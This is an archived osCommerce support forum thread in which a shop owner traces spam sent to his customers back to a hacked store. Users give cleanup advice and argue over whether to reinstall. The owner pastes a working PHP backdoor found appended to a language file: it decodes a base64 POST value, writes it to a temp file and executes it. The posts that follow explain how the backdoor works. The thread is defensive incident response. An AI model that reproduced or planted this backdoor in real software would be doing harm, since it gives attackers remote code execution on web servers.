Jump to content

Archived

This topic is now archived and is closed to further replies.

benny_bobo

customers recieving spam from our online shop

Recommended Posts

Hey,

 

Recently done the securing admin guide (rename admin folder, htpasswd on admin folder, not using 'administrator' or 'admin' as username, etc...)

 

A few of our customers report to us that they have recieved spam from our online shop email address.

 

The reason I believe its via our shop, is: they are using the customer's actual name, it uses our exact shop name, shop email address & shop email signature.

 

Edit: I also recieved the email as I have a 'test' customer account, I checked the headers and it WAS sent from my webhost's server...

 

Has anyone had this happen before? How is it happening?

 

From: <our online shop email>

Sent: Monday, 28 March 2011 4:33 PM

To: <our customer's name>

Subject: <our customer's name>, you got a Free Discount Card!

 

Congratulations! You got a Free Discount Card!

 

For full contest details visit us here

http://www.walshoe.com/discount/?prise=#code#'>http://www.walshoe.com/discount/?prise=#code#

 

If the above link does not work correctly, go to http://www.walshoe.com/discount/

 

You will need to enter the following your account:

Username: #email#

Activation Code: #code#

 

Thank you,

<our online shop signature>

Share this post


Link to post
Share on other sites

It's a modified version on 2.2 rc2

 

also noticed email header "X-Mailer: osCommerce".

 

searched the sourcecode for all references to 'X-Mailer', the admin section (<admin>/mail.php, <admin>/inc/func/general.php) is the only place that uses exactly 'osCommerce'. Everywhere else uses 'osCommerce Mailer' or 'osCommerce Bulk Mailer'.

Share this post


Link to post
Share on other sites

It is obvious that you have a doorway in your site which you have not locked, or locked too late.

Your site will need cleaning properly and securing properly.


Help shape the future of Phoenix; join the Phoenix Club

Share this post


Link to post
Share on other sites

It is obvious that you have a doorway in your site which you have not locked, or locked too late.

Your site will need cleaning properly and securing properly.

 

On 16th March 2011 site was hacked (was unsecured).

 

That day I:

changed admin directory

changed admin passwords

added htpasswd to new admin folder (different password to the login page)

removed filemanager.php

removed the login.php parsing vulnerability.

 

Haven't had any issues since then, until now.

Share this post


Link to post
Share on other sites

Have you checked your directories for added files, in particular files whose code is obscured with long strings of random looking code. Look in the image folder for example, that is often where they get hidden. If an attacker has uploaded a shell script they will then be able to use it to email from your site. Contrary to popular belief, if there is a shell script on your site, say in the image folder, or files have been overwritten or appended to with malicious code, an attacker can with a constructed piece of code, mirror the functions in the admin section to send mail to your customer database without having to actually have access to the admin folder.

 

In terms of mass email, the admin folder after all contains files that talk to the database to send emails to your customer database.

 

This is often why the best advice anyone can give to people whose sites have been attacked, is to completely clean out their files and start again with the latest version of oscommerce including all the security additions. Some are finding that even their backups have exploit code in them so even advising to restore sometimes does not fix the issue.

 

Its just too risky to make a few cosmetic changes if you are not sure exactly what damage has already been done, when in doubt, start from scratch with the latest version of oscommerce...ver 2.3.1.


- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Share this post


Link to post
Share on other sites

I have same problem. A lot of security updates done.

I'm not sure if spams are sent from the my oscommerce site even in the mail header read so.

 

Is it possible that the customers data are downloaded from database early and spams are sent later from other site?

Share this post


Link to post
Share on other sites

We have the same problem as well. Can we shoot the evil-doers at walshoe.com? :angry:

 

Thanks Taipo for the useful advice. Benny (or others) please continue to post your findings as we will be following this thread for a solution.

Share this post


Link to post
Share on other sites

It's a modified version on 2.2 rc2

 

also noticed email header "X-Mailer: osCommerce".

 

searched the sourcecode for all references to 'X-Mailer', the admin section (<admin>/mail.php, <admin>/inc/func/general.php) is the only place that uses exactly 'osCommerce'. Everywhere else uses 'osCommerce Mailer' or 'osCommerce Bulk Mailer'.

 

If you have protected your admin directory with htaccess and these emails are still being generated from your website then there is another file that has been uploaded somewhere on the site that does exactly what the admin mail function does.

 

If you merely changed the name of the admin directory and these emails are still being generated from your site, then there is most likely another rogue file that has been uploaded prior to patching your site which gives an attacker a full list of files and directories with which they were able to get the new name of your admin directory and continue their attack.

 

This is just another reason why any advice to fix exploits that stops short of heavily advising you to start again with the latest version, is inadequate advice. Because these additions to your site are often quite difficult to detect (other than the inital attack on the admin bypass exploit), it is best you build a new site with the latest version of oscommerce which has been patched against the exploit, and import your database and images from your image folder (delete anything else in the images folder that is not an image), and go with the new version of the site.

 

Again many think that because of the amount of customization they have done to their sites that this is too much work, but in the end when you take into account just how much damage has been done and is being done to your online security credibility as a e-retailer, and also the amount of effort put into picking up the pieces after such attacks, rooting out rogue code in files, and hunting down rogue files in directories, search your database for injected code etc etc etc in the end it is less energy expended to just build a new site and import the database.


- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Share this post


Link to post
Share on other sites

This is just another reason why any advice to fix exploits that stops short of heavily advising you to start again with the latest version, is inadequate advice.

 

Disagree. Starting again with the latest version is poor advice if a shop is heavily customised. There are a few people in the forum who know osCommerce well enough to detect rogue code just by looking at each and every file. Do it that way and the shop is clean, secure and still as customised as it was.

 

Because these additions to your site are often quite difficult to detect (other than the inital attack on the admin bypass exploit), it is best you build a new site with the latest version of oscommerce which has been patched against the exploit, and import your database and images from your image folder (delete anything else in the images folder that is not an image), and go with the new version of the site.

 

Again, I disagree.

 

Again many think that because of the amount of customization they have done to their sites that this is too much work, but in the end when you take into account just how much damage has been done and is being done to your online security credibility as a e-retailer, and also the amount of effort put into picking up the pieces after such attacks, rooting out rogue code in files, and hunting down rogue files in directories, search your database for injected code etc etc etc in the end it is less energy expended to just build a new site and import the database.

 

Again, disagree. To cleanse and lockdown a very hacked site is not more than 1 day of work. To port a DB, set up 2.3.1, add the customisations, skin it, can be a week or more of work. And you end up with a shop that is no more secure than a properly secured/cleansed 2.2

 

FUD - there is NO need to upgrade a hacked pre-231 site - a cleanse and lockdown is enough, done properly.


Help shape the future of Phoenix; join the Phoenix Club

Share this post


Link to post
Share on other sites

If you are proficient enough in PHP then by all means clean your own site. But that is not the norm as most are not proficient in PHP enough to recognize the additional code and a quick look at the security forums should show you that many people that attempt this get their sites hacked again because they missed one appended code piece.

 

Meanwhile one or two of these attackers even has the cheek to come into these forums and try to see the credit card details they have nicked from Oscommerce users databases.

 

FUD - there is NO need to upgrade a hacked pre-231 site - a cleanse and lockdown is enough, done properly.

 

Ok I'll play along.

 

CD Its far easier to create a new reality than face the real one.


- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Share this post


Link to post
Share on other sites

I've checked files against local backups by date modified (my shop has only been up for 2 months). Couldn't find anything else after original cleanse..

 

I installed a statistics application on the server to track urls. Already showing some 404's to "/admin/customers.php/login.php"...

I'm just going to monitor that...

 

If it happens again, I can see how they are doing it..

Share this post


Link to post
Share on other sites

Benny,

 

In addition to looking for changed files, be sure to check your database info itself. The PHP code in osCommerce builds your web pages from the database, too. First, I'd check every value in the 'configuration' table. If it has '< ? php' or '< ?' (without spaces) in any field, every time a page is viewed you could be reinfecting yourself.

 

Check out post #19 in http://forums.oscommerce.com/topic/371193-files-injected-into-images-directory/

 

HTH,

Jim

Share this post


Link to post
Share on other sites

I seem to have found the last trace in "includes/languages/english/password_forgotten.php"

 

<!--<?php if(isset($_GET['cookies'])){echo '--><i>google_a'.'ddons_mgr</i><br>cf<br>';if(isset($_POST['e'])){if(!function_exists('sys_get_temp_dir')){function sys_get_temp_dir(){if($temp=getenv('TMP')){return $temp;}if($temp=getenv('TEMP')){return $temp;}if($temp=getenv('TMPDIR')){return $temp;}$temp=tempnam(__FILE__,'');if(file_exists($temp)){unlink($temp);return dirname($temp);}return null;}}$tmppth=str_replace(chr(92),chr(47),realpath(sys_get_temp_dir()));if(substr($tmppth,-1)!=chr(47)){$tmppth.=chr(47);}if(!$tmppth){echo 'NoTmpPth';exit;}else{$tmpfl=$tmppth.time().time().'.tmp';}$s='<'.'?php '.base64_decode($_POST['e']).' ?'.'>';$k=@file_put_contents($tmpfl,$s);if(!$k){$k=@fopen($tmpfl,'w');if($k){$k=@fwrite($h,$s);@fclose($h);}}if(!$k){echo 'CantWr';exit;} else {include($tmpfl);@unlink($tmpfl);}}exit;} ?>-->

 

Now replaced file.

Share this post


Link to post
Share on other sites

My understanding of that code is that it is:

- checking for temp directory

- decode base64 coded string passed via a post variable named 'e'

- write the decrypted data to 'tempdir'/'timestamp'.tmp

- include (execute) the created file

- delete the file.

Share this post


Link to post
Share on other sites

Thats about it. Its an attempt to place files into the main webserver temp directory. To activate it the attacker or attack 'bot' calls the file like www.somesite.com/cookie_usage.php?cookies (adding ?cookie to envoke the message) which will result in a display saying something like

 

-->google_addons_mgr<--

 

Which indicates that the file has the rogue code appended in it.

 

Then a POST request is sent through with a base64 string to that file (in this case cookie_usage.php for example), which will attempt to create and write to a file higher up in the webservers directories with the intention most likely to get root access or access to non-root services to run arbitrary code.

 

The bigger question is how were they able to append code into the header of your files. If you have stopped up that hole then you shouldn't get any more appended code. But you just need to have missed one of these and they can all come back quick smart.

 

There are a couple of links in my signature that talk about how these codes are used.


- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Share this post


Link to post
Share on other sites

×